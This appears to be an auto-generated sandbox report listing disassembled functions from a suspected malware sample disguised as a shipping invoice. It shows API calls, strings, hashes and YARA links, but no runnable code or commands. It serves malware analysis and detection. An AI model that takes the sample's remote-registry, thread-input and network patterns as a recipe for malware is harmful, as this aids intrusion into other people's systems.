Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 7b38b459b0b7ee8610b7421aa3696a694746c801a850e6032a21f670c94f97eb
Instruction ID: dc6073b0ffb8b2717a848ac97e341e3e6e2156971ee481b89b677cdd9599d0e4
Opcode Fuzzy Hash: 7b38b459b0b7ee8610b7421aa3696a694746c801a850e6032a21f670c94f97eb
Instruction Fuzzy Hash: 5A414D72800209AACB04FBE1CD82EEE777DAF14745F10403BB60172092EB796F49CB69

Function 004606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004607A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004607BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004607DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00460804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0046082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00460837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0046083C

Strings

\IPC$, xrefs: 00460784
\CLSID, xrefs: 00460724
SOFTWARE\Classes\, xrefs: 0046070E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 4f9931b86399ff3fdc48cabcab343352e6cc1c909b92cb775524740a28e2332d
Instruction ID: 456a90b4fc616be063c3ea6fd44dfdeda56d2f04aa281644d67354a3b811078f
Opcode Fuzzy Hash: 4f9931b86399ff3fdc48cabcab343352e6cc1c909b92cb775524740a28e2332d
Instruction Fuzzy Hash: DF411972910228ABCB15EFA4DC85DEEB778BF14344F14413AE901B32A1EB346E14CB94

Function 00477A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00477AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00477B8F
SHGetDesktopFolder.SHELL32(?), ref: 00477BA3
CoCreateInstance.OLE32(0049FD08,00000000,00000001,004C6E6C,?), ref: 00477BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00477C74
CoTaskMemFree.OLE32(?,?), ref: 00477CCC
SHBrowseForFolderW.SHELL32(?), ref: 00477D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00477D7A
CoTaskMemFree.OLE32(00000000), ref: 00477D81
CoTaskMemFree.OLE32(00000000), ref: 00477DD6
CoUninitialize.OLE32 ref: 00477DDC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: f6687e422928640ca7869dec78d00f4ed6719a713b8843af70cafdad0ba949d0
Instruction ID: 39bbd3678709868c1330d616e21568fed79a46750d80a3cae74fa18317dd7f80
Opcode Fuzzy Hash: f6687e422928640ca7869dec78d00f4ed6719a713b8843af70cafdad0ba949d0
Instruction Fuzzy Hash: 5EC12C75A04109AFCB14DF64C884DAEBBF5FF48308B1484AAE91AEB361D734ED45CB94

Function 0049541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00495504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00495515
CharNextW.USER32(00000158), ref: 00495544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00495585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0049559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004955AC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: d161e1ce9203be114704a4439add49d4e860955f28bb8d8851bfc5335a59baec
Instruction ID: 23b6a745198481fe7597f927e24a292adea9889f47785b6f77cf4ece44108869
Opcode Fuzzy Hash: d161e1ce9203be114704a4439add49d4e860955f28bb8d8851bfc5335a59baec
Instruction Fuzzy Hash: 5761AD71900608BBDF12DF50CC84EFF3FB9EB05720F204066F925A6291D7389A81DB69

Function 0045FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0045FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0045FB08
VariantInit.OLEAUT32(?), ref: 0045FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0045FB3A
VariantCopy.OLEAUT32(?,?), ref: 0045FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0045FBA1
VariantClear.OLEAUT32(?), ref: 0045FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0045FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0045FBCC
VariantClear.OLEAUT32(?), ref: 0045FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0045FBE9

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d065f95d9964d003929c320fd761995a09dfa1eba26e18688a85f29929e3774e
Instruction ID: d0f5244db563a2ebb953bca7e1bf553e058448cf4b9d20363b30dd2a6705a66b
Opcode Fuzzy Hash: d065f95d9964d003929c320fd761995a09dfa1eba26e18688a85f29929e3774e
Instruction Fuzzy Hash: CD416035A00219DFCF00DF64C8949AEBBB9FF58345F00807AE915A7262DB34A949CFA5

Function 0048055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004805BC
inet_addr.WSOCK32(?), ref: 0048061C
gethostbyname.WSOCK32(?), ref: 00480628
IcmpCreateFile.IPHLPAPI ref: 00480636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004806C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004806E5
IcmpCloseHandle.IPHLPAPI(?), ref: 004807B9
WSACleanup.WSOCK32 ref: 004807BF

Strings

Ping, xrefs: 00480676

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c247edb2eed694ae295fc67957cb95a495a4c18ce6dbcdd1137eebf9cadcd6c5
Instruction ID: 5c0c681a77d667199f412a631dc81a6052911fdb817d86fd0548510bbdadaad4
Opcode Fuzzy Hash: c247edb2eed694ae295fc67957cb95a495a4c18ce6dbcdd1137eebf9cadcd6c5
Instruction Fuzzy Hash: 9A91A135614241AFD360EF15C489F1ABBE0EF44318F1489AAF4699B7A2C738EC49CF95

Function 00488CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00488CF3

Part of subcall function 00468E54: _wcslen.LIBCMT ref: 00468E77

_wcslen.LIBCMT ref: 00488D4E
_wcslen.LIBCMT ref: 00488D9C
_wcslen.LIBCMT ref: 00488DDC
_wcslen.LIBCMT ref: 00488E6E

Strings

stdcall, xrefs: 00488DD6, 00488DDB
none, xrefs: 00488E65, 00488E6A
winapi, xrefs: 00488D96, 00488D9B
cdecl, xrefs: 00488D48, 00488D4D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: cb388e303b5336f06868d7919d8d2e66aec040e8f0d5d8257fd8325fbab22050
Instruction ID: 8212ab8b0198c01814745c1b291fcdb86e5b13909f40ebd7fc902a52f087fba3
Opcode Fuzzy Hash: cb388e303b5336f06868d7919d8d2e66aec040e8f0d5d8257fd8325fbab22050
Instruction Fuzzy Hash: 3251A431A001169BCB14EF69C9409BE73E5BF64324BA1462FE825E73C5DB39DD41C798

Function 0048372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00483774
CoUninitialize.OLE32 ref: 0048377F
CoCreateInstance.OLE32(?,00000000,00000017,0049FB78,?), ref: 004837D9
IIDFromString.OLE32(?,?), ref: 0048384C
VariantInit.OLEAUT32(?), ref: 004838E4
VariantClear.OLEAUT32(?), ref: 00483936

Strings

Invalid parameter, xrefs: 00483865
Failed to create object, xrefs: 004837E4, 0048389A
NULL Pointer assignment, xrefs: 0048381E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 1a80d009dbb9f2ac7bf3bb44ceae522497428bdc4dd0e1c13d26cb6814bec441
Instruction ID: 09448163fb94b08c5125ba562485cc8212cf43027621ceee6864fd56bf278ce6
Opcode Fuzzy Hash: 1a80d009dbb9f2ac7bf3bb44ceae522497428bdc4dd0e1c13d26cb6814bec441
Instruction Fuzzy Hash: B3618D70608301AFD310EF55C888B5EB7E4AF44B15F10485EF98597291D778EE49CB9A

Function 00498B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

Part of subcall function 0041912D: GetCursorPos.USER32(?), ref: 00419141
Part of subcall function 0041912D: ScreenToClient.USER32(00000000,?), ref: 0041915E
Part of subcall function 0041912D: GetAsyncKeyState.USER32(00000001), ref: 00419183
Part of subcall function 0041912D: GetAsyncKeyState.USER32(00000002), ref: 0041919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00498B6B
ImageList_EndDrag.COMCTL32 ref: 00498B71
ReleaseCapture.USER32 ref: 00498B77
SetWindowTextW.USER32(?,00000000), ref: 00498C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00498C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00498CFF

Strings

@GUI_DROPID, xrefs: 00498C51
@GUI_DRAGFILE, xrefs: 00498C9A
p#M, xrefs: 00498C71

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#M
API String ID: 1924731296-1961496832
Opcode ID: 06de6f4ed672b4f868e7cfaa5b5db41331229d1416ab3956df12f097b3293ae0
Instruction ID: 52717fa2b95b97a14e042308ffc4897870df37abc473548e4af4715ce2610060
Opcode Fuzzy Hash: 06de6f4ed672b4f868e7cfaa5b5db41331229d1416ab3956df12f097b3293ae0
Instruction Fuzzy Hash: D1517B71105300AFDB00EF15D8A9FAA7BE4BB85714F40063EF956672E2CB789D44CB6A

Function 00473388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004733CF

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004733F0

Strings

Line %d (File "%s"):, xrefs: 00473443, 0047345C
"%s" (%d) : ==> %s:%s%s, xrefs: 00473504
"%s" (%d) : ==> %s:, xrefs: 00473522
^ ERROR , xrefs: 0047349E
Error: , xrefs: 004734D1
Incorrect parameters to object property !, xrefs: 004734AB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 7350e0165f010d261893c9f4803e04fb0f7d59449f32f750725959f3c8171fb2
Instruction ID: 1426893d16c5a8541d83e9fc750115f455adac83308913478daf6e2c423aeb3d
Opcode Fuzzy Hash: 7350e0165f010d261893c9f4803e04fb0f7d59449f32f750725959f3c8171fb2
Instruction Fuzzy Hash: 19518271900109BADF14EBE1CD46EEEB778AF04745F10807BB905721A2EB392F58DB69

Function 0046B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0046B5FC
_wcslen.LIBCMT ref: 0046B608
_wcslen.LIBCMT ref: 0046B64D
_wcslen.LIBCMT ref: 0046B68C
_wcslen.LIBCMT ref: 0046B6C7

Strings

APPEND, xrefs: 0046B6C1, 0046B6C6
REMOVE, xrefs: 0046B602, 0046B607
KEYS, xrefs: 0046B647, 0046B64C
EXISTS, xrefs: 0046B686, 0046B68B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: e1c4ef30d4339e6e2b65e40461cf0db23954e06adbf37201190a46b47bcb9e52
Instruction ID: 16ff66291ae7142d824ee3a28711f6f5a2cfdd0b8d46551da25f226ae2d73451
Opcode Fuzzy Hash: e1c4ef30d4339e6e2b65e40461cf0db23954e06adbf37201190a46b47bcb9e52
Instruction Fuzzy Hash: 4B41F432A011269ACB206F7DC8905BF77A5EBA0758B25412BE421DB384F739CDC2C7D6

Function 00475393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004753A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00475416
GetLastError.KERNEL32 ref: 00475420
SetErrorMode.KERNEL32(00000000,READY), ref: 004754A7

Strings

UNKNOWN, xrefs: 00475444
READONLY, xrefs: 00475452
INVALID, xrefs: 00475459
NOTREADY, xrefs: 0047544B
READY, xrefs: 00475460, 00475468

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 729518a6c0cfb7bbb2194ed8628378fe14ba429d7a222be60e312a83549b7c57
Instruction ID: c84e953c2e58dff2a5b5b0cc672f699c00e7d82dfc9b0f9726610f43d7423484
Opcode Fuzzy Hash: 729518a6c0cfb7bbb2194ed8628378fe14ba429d7a222be60e312a83549b7c57
Instruction Fuzzy Hash: 7F318D35A005049FDB10DF68C484BEA7BA4EB45309F14C06BE40ADF392DBB9DD82CB99

Function 00493C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00493C79
SetMenu.USER32(?,00000000), ref: 00493C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00493D10
IsMenu.USER32(?), ref: 00493D24
CreatePopupMenu.USER32 ref: 00493D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00493D5B
DrawMenuBar.USER32 ref: 00493D63

Strings

0, xrefs: 00493C54
F, xrefs: 00493D4E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: b2a60e14e018d663fa55a81db5ff368922ac4faeb82bc60f9e85116724bebc83
Instruction ID: b91e1e235a1bc7a01833517849901071aef4b11d4c4293359304a87f4873cbf2
Opcode Fuzzy Hash: b2a60e14e018d663fa55a81db5ff368922ac4faeb82bc60f9e85116724bebc83
Instruction Fuzzy Hash: 73416CB5A01209EFDF14CFA4D894AAA7BB5FF4A351F14013AE94697360D734AA10CB58

Function 00493A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00493A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00493AA0
GetWindowLongW.USER32(?,000000F0), ref: 00493AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00493AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00493B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00493BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00493BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00493BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00493BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00493C13

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 863a9386dd68544a25b4dbb1b0d7cc861b13c881a53a64f4b53dda24079983d3
Instruction ID: ade6b4bc2faa9311db67ada8b044e63368f6cba9b4a03933416f70eda9a3338b
Opcode Fuzzy Hash: 863a9386dd68544a25b4dbb1b0d7cc861b13c881a53a64f4b53dda24079983d3
Instruction Fuzzy Hash: 7E615D75900248AFDB10DFA4CC81EEE7BB8EB09704F1041AAFA15A73A2D774AE45DB54

Function 0046B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0046B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B165
GetWindowThreadProcessId.USER32(00000000), ref: 0046B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0046B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0046A1E1,?,00000001), ref: 0046B21D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
